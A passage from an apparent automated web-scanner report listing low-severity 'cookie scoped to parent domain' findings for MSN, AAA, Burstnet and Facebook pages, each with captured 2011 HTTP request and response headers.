GET /oz/sensor?p=rubicon&pc=7664/12228&cd=false&xt=14&k=customer+support:224,games:212,game:128,gamehouse+customer:80,call+center:64,center+hours:64,chat+hours:64,support:62,download+game:60,free+game:60,customer:58,gamehouse:56,hidden+object:56,pc+games:48,time+management:48,mac+games:48,match+3:48,downloadable+games:40,download+games:40,free+games:40,game+daily:40,favorite+download:40,games+now:40,831+5895:40,email+us:40,call+us:40,866+831:40,1+866:40,us+1:40,top+games:40,support+team:36,center+hour:32,super+saver:32,object+games:32,chat+hour:32,hours:32,mortimer+beckett:24,adventure+games:24,strategy+games:24,management+games:24,&t=Contact+GameHouse+Customer+Support HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; khaos=GOVBRMNC-I-DXQD; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; dq=95|8|87|0; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; put_2211=2814750682866683; rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1

Response

HTTP/1.1 204 No Content
Date: Tue, 19 Jul 2011 20:26:08 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Wed, 18-Jul-2012 20:26:08 GMT; Path=/
Set-Cookie: dq=97|8|89|0; Expires=Wed, 18-Jul-2012 20:26:08 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


13.116. http://video.msn.com/services/user/info  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.msn.com
Path:   /services/user/info

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/user/info?callback=jsonp1311088599886&responseEncoding=json&uxmkt=en-US HTTP/1.1
Host: video.msn.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/about-bing/bing-video/1hh72z4pd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MUID=E361C23374E642C998D8ABA7166A75EC; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; Sample=93; SRCHHPGUSR=AS=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Machine: CH1********302
Set-Cookie: zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; domain=msn.com; expires=Tue, 26-Jul-2011 15:16:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:35 GMT
Content-Length: 185
Connection: keep-alive

jsonp1311088599886({"user":{"country":{"name":{"$":'US'},"flags":{"$":'40000000'},"zip":{"$":'75207'},"$":null},"market":{"name":{"$":'en-us'},"enabled":{"$":'True'},"$":null},"$":""}})

13.117. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aaa.com
Path:   /scripts/WebObjects.dll/ZipCode.woa/wa/route

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:04:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW4
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com
content-length: 1151

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com?zip=05672">


<TITLE>www.aaa.com redirect</TITLE>
</HE
...[SNIP]...

13.118. http://www.burstnet.com/enlightn/7117//930F/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7117//930F/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7117//930F/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^13v.1EcU^13R.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:26:02 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^13v.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:26:02 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

13.119. http://www.burstnet.com/enlightn/7121//7128/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7121//7128/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7121//7128/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/detail/a_id/861/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:27:34 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:27:34 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

13.120. http://www.burstnet.com/enlightn/7177//7F4D/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/7177//7F4D/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/7177//7F4D/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16vda0204fei8g; 56Q8=3xpADaXQYdUGsRSf7wh-rBNRO0PfAQMVRhXbM9AvupBS1rKdv8AEW6Q; CMS=/; CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^13v.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:26:48 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:26:48 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

13.121. http://www.facebook.com/advertising/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /advertising/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /advertising/?campaign_id=402047449186&placement=pflo&extra_1=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.88.37
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:45 GMT
Content-Length: 22238

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/advertising\/index.php";window._EagleEyeSeed="42vQ";</scr
...[SNIP]...

13.122. http://www.facebook.com/ajax/intl/language_dialog.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.111.31
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:23 GMT
Content-Length: 42761

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/ajax\/intl\/language_dialog.php";window._EagleEyeSeed="bq
...[SNIP]...

13.123. http://www.facebook.com/ajax/prefetch.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/prefetch.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajax/prefetch.php?svn_rev=407015&tier=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/terms.php?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=31536000
Content-Type: text/html;charset=utf-8
Expires: Wed, 18 Jul 2012 14:59:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.62.99.45
X-Cnection: close
Date: Tue, 19 Jul 2011 14:59:00 GMT
Content-Length: 1414

<!DOCTYPE html><html><head><script>document.domain = 'facebook.com';</script><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/VXhD5_PgFOo.css" /><link type="tex
...[SNIP]...

13.124. http://www.facebook.com/badges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badges?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.120.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:29 GMT
Content-Length: 0


13.125. http://www.facebook.com/badges/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /badges/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fbadges%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.92.64
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:33 GMT
Content-Length: 15265

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/badges\/index.php";window._EagleEyeSeed="emCA";</script><
...[SNIP]...

13.126. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php?placement=pflo&campaign_id=402047449186&extra_1=auto HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; expires=Thu, 18-Aug-2011 14:57:43 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.102.30
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:43 GMT
Content-Length: 0


13.127. http://www.facebook.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.121.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:50 GMT
Content-Length: 20897

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/careers\/index.php";window._EagleEyeSeed="Ikcl";</script>
...[SNIP]...

13.128. http://www.facebook.com/directory/pages/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.102.50
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:38 GMT
Content-Length: 49022

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="0cuF";</scrip
...[SNIP]...

13.129. http://www.facebook.com/directory/people/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
